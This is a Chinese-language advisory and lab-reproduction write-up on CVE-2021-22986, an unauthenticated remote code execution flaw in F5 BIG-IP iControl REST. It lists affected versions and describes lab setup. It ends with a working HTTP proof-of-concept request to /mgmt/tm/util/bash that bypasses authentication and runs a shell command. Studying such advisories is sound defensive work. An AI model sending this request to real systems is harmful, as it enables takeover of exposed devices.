F5 BIG-IP iControl 未授权远程代码执行漏洞

0x01  漏洞介绍

      F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。BIG-IP提供了应用程序加速、负载均衡、速率调整、SSL卸载和Web应用程序防护功能。该产品已被许多公司使用，F5声称全球50强公司中有48家是其客户。 

      近日，F5发布了多个高危漏洞通告，其中CVE-2021-22986是严重级别的未授权远程代码执行。该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问，以执行任意系统命令，创建或删除文件以及禁用服务。

0x02  漏洞编号

CVE-2021-22986

0x03  漏洞等级

CVSS：CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

漏洞等级：9.8 | 严重

0x04 漏洞影响范围

16.0.0 <= BIG-IP <= 16.0.1 

15.1.0 <= BIG-IP <= 15.1.2 

14.1.0 <= BIG-IP <= 14.1.3.1 

13.1.0 <= BIG-IP <= 13.1.3.5 

12.1.0 <= BIG-IP <= 12.1.5.2 

7.1.0 <= BIG-IQ <= 7.1.0.2 

7.0.0 <= BIG-IQ <= 7.0.0.1 

6.0.0 <= BIG-IQ <= 6.1.0

0x05 漏洞POC

参考地址：

https://blog.riskivy.com/f5%e4%bb%8e%e8%ae%a4%e8%af%81%e7%bb%95%e8%bf%87%e5%88%b0%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/

0x06 漏洞复现过程

环境下载：

访问官方地址：

https://downloads.f5.com/esd/product.jsp?sw=BIG-IP&pro=big-ip_v14.x&ver=14.1.2

下载BIGIP 14.1.2版本。

BIGIP提供多版本下载，其中包括各种部署完成的虚拟机以及ISO系统镜像。

下载完成后，直接导入到vmware中打开，默认root密码为default，初次登录需要修改密码。登录到系统后输入命令config开始部署网络。

部署完成后，即可使用https协议访问该系统。

然后使用用户名admin，初始密码为修改后的root密码即可登录，初次登录后需要修改admin密码。

修改完成后，使用新密码登录系统，完成系统初步部署。

至此，漏洞环境部署完毕。

漏洞复现：

POC:

POST /mgmt/tm/util/bash HTTP/1.1Host: 10.*.*.*User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36Accept: */*Connection: closeAuthorization: Basic YWRtaW46X-F5-Auth-Token: Content-Length: 42Content-Type: application/json
{"command": "run", "utilCmdArgs": "-c id"}

这里需要注意的是，Authorization中的Basic认证只需要用户名即可，默认admin，即YWRtaW46的base64解码明文为"admin:"。此外，header中X-F5-Auth-Token: 不可缺少。

验证结果：

本文始发于微信公众号（锋刃科技）：F5 BIG-IP iControl 未授权远程代码执行漏洞